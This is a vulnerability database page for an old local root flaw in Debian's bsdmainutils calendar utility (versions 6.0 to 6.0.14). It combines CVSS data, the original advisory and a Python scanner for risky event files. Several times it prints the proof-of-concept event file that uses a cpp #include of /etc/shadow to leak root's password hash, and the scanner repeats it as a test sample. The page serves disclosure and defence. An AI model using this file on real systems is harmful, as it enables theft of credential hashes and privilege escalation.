Published: 2004-10-20 00:00:00
Revised: 2016-10-17 22:49:03

[Original] The calendar program in bsdmainutils 6.0 through 6.0.14 does not drop root privileges when executed with the -a flag, which allows attackers to execute arbitrary commands via a calendar event file.


Debian bsdmainutils includes the Calendar utility, which notifies users of upcoming events. The event file shown in the advisory (with <tab> standing for a real tab character):
#define root Jun. 28<tab>cut_here
#include </etc/shadow>
Jun. 28<tab>Birthday of Steven Van Acker
Aug. 19<tab>Birthday of Andrew Griffith

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be fully compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication required for exploitation]

- CWE (weakness category)

CWE-264 [Permissions, Privileges, and Access Controls]

- CPE (affected platforms and products)

cpe:/a:debian:bsdmainutils:6.0.10 - Debian bsdmainutils 6.0.10
cpe:/a:debian:bsdmainutils:6.0.6 - Debian bsdmainutils 6.0.6
cpe:/a:debian:bsdmainutils:6.0.9 - Debian bsdmainutils 6.0.9
cpe:/a:debian:bsdmainutils:6.0.8 - Debian bsdmainutils 6.0.8
cpe:/a:debian:bsdmainutils:6.0.11 - Debian bsdmainutils 6.0.11
cpe:/a:debian:bsdmainutils:6.0.12 - Debian bsdmainutils 6.0.12
cpe:/a:debian:bsdmainutils:6.0.13 - Debian bsdmainutils 6.0.13
cpe:/a:debian:bsdmainutils:6.0.3 - Debian bsdmainutils 6.0.3
cpe:/a:debian:bsdmainutils:6.0.2 - Debian bsdmainutils 6.0.2
cpe:/a:debian:bsdmainutils:6.0.5 - Debian bsdmainutils 6.0.5
cpe:/a:debian:bsdmainutils:6.0.4 - Debian bsdmainutils 6.0.4
cpe:/a:debian:bsdmainutils:6.0.1 - Debian bsdmainutils 6.0.1
cpe:/a:debian:bsdmainutils:6.0.14 - Debian bsdmainutils 6.0.14
cpe:/a:debian:bsdmainutils:6.0 - Debian bsdmainutils 6.0
cpe:/a:debian:bsdmainutils:6.0.7 - Debian bsdmainutils 6.0.7

- OVAL (technical details for detection)


- Official database links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other links and resources
(UNKNOWN)  BUGTRAQ  20040830 Possible root compromose with bsdmainutils 6.0.x < 6.0.15 (Debian testing/unstable)
(PATCH)  XF  bsdmainutils-calendar-gain-privileges(17162)

- Vulnerability information

High risk; Permissions, Privileges and Access Control
2004-10-20 00:00:00 2005-10-20 00:00:00

- Advisories and patches


- Vulnerability information (F34223)

calendar_advisory.txt (PacketStormID:F34223)
2004-09-02 00:00:00
Steven Van Acker  

The bsdmainutils package versions below 6.0.15 allow for a local root compromise via the calendar program.

Possible root compromise with calendar (bsdmainutils 6.0.x < 6.0.15)


The calendar utility is a handy little tool that informs you about upcoming
events. Each user can define his/her own calendar events. In Debian
(and possibly other distributions as this option is builtin in calendar),
calendar can be run from cron so that users get upcoming event notifications
by mail.
This can be abused to gain root access.

This vulnerability is also known as CAN-2004-0793.

Systems affected

Debian testing and Debian unstable with the bsdmainutils package installed.
(Versions 6.0 to 6.0.14 are vulnerable, >=6.0.15 is not)

How calendar works

The calendar program uses event files with this format:

<date><tab><event description>

This is not all however. Calendar gives users the ability to include other
event-files and define variables and macros. To do this, it calls cpp (the C
preprocessor) on the main event file and processes the output.

When called with the "-a" option, calendar will process the event files of
all users and send the result by mail.

The bsdmainutils package in Debian uses this feature from
Luckily, it is not enabled by default since you have to uncomment an "exit 0"
line in the cron script to activate it.

The problem

Calendar does not drop its privileges. In order to be useful when running with
the "-a" option, it needs to run as root.
By creating an event file as follows, we can get the hashed root password (on
June 28th ;) :

#define root Jun. 28<tab>cut_here
#include </etc/shadow>
Jun. 28<tab>Birthday of Steven Van Acker
Aug. 19<tab>Birthday of Andrew Griffith

(<tab> indicates an actual tab, so char '\t')

Since calendar is running as root, there will be no problem accessing the
shadow password file. The result contains the hashed password of root, which
can then be cracked.


Quick fix: don't run "calendar -a" as root !
Graham Wilson (the bsdmainutils package maintainer for Debian) has provided a
fix for this issue. Please upgrade the package :)

Thanks to Graham Wilson for solving the problem and Jacques A. Vidrine
(FreeBSD) for keeping me from making a foolish mistake ;)

-- Steven

PS: happy birthday andrewg! ;)

Steven Van Acker



- Vulnerability information

bsdmainutils calendar Event File Local Privilege Escalation
Local Access Required Information Disclosure
Loss of Confidentiality
Exploit Public

- Vulnerability description

bsdmainutils contains a flaw with the calendar utility that may lead to an unauthorized information disclosure. The issue is triggered when a user creates a specially crafted event file, which may result in the user viewing arbitrary files with root privileges resulting in a loss of confidentiality.

- Timeline

2004-08-30 Unknown
2004-08-30 Unknown

- Solution

Upgrade to version 6.0.15 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: implement the fix released by Debian, if applicable.

- References

- Vulnerability author

- Vulnerability information

Bsdmainutils Calendar Information Disclosure Vulnerability
Access Validation Error 11077
No Yes
2004-08-31 12:00:00 2009-07-12 07:06:00
Steven Van Acker <> disclosed this vulnerability.

- Affected program versions

Debian bsdmainutils 6.0.14
Debian bsdmainutils 6.0.15

- Unaffected program versions

Debian bsdmainutils 6.0.15

- Vulnerability discussion

The calendar utility contained in the bsdmainutils package on Debian GNU/Linux systems is reported susceptible to an information disclosure vulnerability. This is due to a lack of proper file authorization checks by the application.

The application fails to enforce permissions of included files when run as the superuser with the '-a' argument, therefore it is possible for a local attacker to create a calendar file that will disclose the contents of arbitrary, potentially sensitive files. This may aid them in further attacks against the affected computer.

By default, the package is installed with a crontab file that will not call the calendar utility. Systems are only affected if the crontab is enabled by administrators.

Debian GNU/Linux computers with bsdmainutils versions prior to 6.0.15 are reported to be vulnerable.

- Exploit

An exploit is not required. An example calendar file sufficient to exploit this vulnerability was provided. This file would likely be located in '~/.calendar/calendar':

#define root Jun. 28<tab>cut_here
#include </etc/shadow>
Jun. 28<tab>Birthday of Steven Van Acker
Aug. 19<tab>Birthday of Andrew Griffith

(where <tab> should be replaced by an actual Tab character)
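Because calendar(1) hands each user's event file to cpp while running as root, an administrator who must keep "calendar -a" enabled before the 6.0.15 upgrade lands can at least audit the files it will read. The scanner below is an added example, not code from the advisory or from bsdmainutils: it flags every #include whose target resolves outside the owning user's home directory or the shared calendar directory (assumed here to be /usr/share/calendar), and reports whether cpp macros are defined. The sample event files are constructed from the advisory's text.

```python
import os
import re

# cpp directives honoured by calendar(1), which runs the file through cpp
_INCLUDE_RE = re.compile(r'^\s*#\s*include\s*[<"]([^>"]+)[>"]')
_DEFINE_RE = re.compile(r'^\s*#\s*define\b')

# Directories whose calendar files are meant to be shared (assumption: the
# Debian package installs its stock calendars under /usr/share/calendar).
SAFE_INCLUDE_DIRS = ("/usr/share/calendar",)


def risky_includes(text, home):
    """Return (line number, resolved path) for every #include whose target
    lies outside the owning user's home and outside SAFE_INCLUDE_DIRS.
    Relative targets are resolved against ~/.calendar, where calendar(1)
    looks for a user's files. Only the text is inspected, so a symlink
    planted inside ~/.calendar is not caught here; only the upgrade is."""
    allowed = (os.path.normpath(home),) + SAFE_INCLUDE_DIRS
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = _INCLUDE_RE.match(line)
        if not m:
            continue
        target = m.group(1)
        if not os.path.isabs(target):
            target = os.path.join(home, ".calendar", target)
        target = os.path.normpath(target)
        if not any(target == d or target.startswith(d + os.sep) for d in allowed):
            findings.append((lineno, target))
    return findings


def uses_defines(text):
    """True if the file defines cpp macros. Harmless on its own, but the
    advisory's file uses one as a marker line ahead of the included file."""
    return any(_DEFINE_RE.match(line) for line in text.splitlines())


# Constructed sample: the advisory's event file with real tab characters.
MALICIOUS = (
    "#define root Jun. 28\tcut_here\n"
    "#include </etc/shadow>\n"
    "Jun. 28\tBirthday of Steven Van Acker\n"
    "Aug. 19\tBirthday of Andrew Griffith\n"
)
# Constructed sample: a benign file that only includes a calendar from ~/.calendar.
BENIGN = "#include <calendar.birthday>\nAug. 19\tBirthday of Andrew Griffith\n"
```

Run risky_includes over each user's ~/.calendar/calendar with that user's home directory; any finding means the file would read a path the user could not open on their own, which is exactly what the root-owned "calendar -a" run would do for them.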

- Solution

Debian has released version 6.0.15 of bsdmainutils for the unstable branch. Users of affected packages are urged to use Debian's package management utilities to upgrade to the latest version of bsdmainutils.

- References